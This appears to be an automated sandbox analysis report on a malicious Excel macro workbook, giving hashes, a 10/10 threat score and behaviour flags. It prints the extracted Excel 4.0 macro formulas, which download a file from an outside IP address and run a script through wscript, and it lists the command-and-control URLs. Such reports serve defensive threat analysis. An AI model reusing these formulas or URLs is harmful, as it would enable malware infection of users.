General
-
Target
97a60be3dee6ac2aaab0aa24ada9490b
-
Size
6KB
-
Sample
231222-qbs2sadfbk
-
MD5
97a60be3dee6ac2aaab0aa24ada9490b
-
SHA1
6094231dea0e463c0301e425b9a337c6240d2474
-
SHA256
6dd6c9edb655b3001a9381a76ebebd680427e6f09be0c237a94ccf365c83918d
-
SHA512
9f43ce54d26ee817c99e62aae4c44eee0a501c827aeaba11acb9af71880ac8dc77ef4c4c4d0f20f885dc52d06711734dd97dd94fface51e0b47dcd459b0b91f2
-
SSDEEP
192:NDSJluSxbrA2OmmfRo8UhHFBFYuGb98ysSwF+c:N8uOM2w+1FYzb98y/w1
Static task
static1
Behavioral task
behavioral1
Sample
97a60be3dee6ac2aaab0aa24ada9490b.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
97a60be3dee6ac2aaab0aa24ada9490b.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
97a60be3dee6ac2aaab0aa24ada9490b
-
Size
6KB
-
MD5
97a60be3dee6ac2aaab0aa24ada9490b
-
SHA1
6094231dea0e463c0301e425b9a337c6240d2474
-
SHA256
6dd6c9edb655b3001a9381a76ebebd680427e6f09be0c237a94ccf365c83918d
-
SHA512
9f43ce54d26ee817c99e62aae4c44eee0a501c827aeaba11acb9af71880ac8dc77ef4c4c4d0f20f885dc52d06711734dd97dd94fface51e0b47dcd459b0b91f2
-
SSDEEP
192:NDSJluSxbrA2OmmfRo8UhHFBFYuGb98ysSwF+c:N8uOM2w+1FYzb98y/w1
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-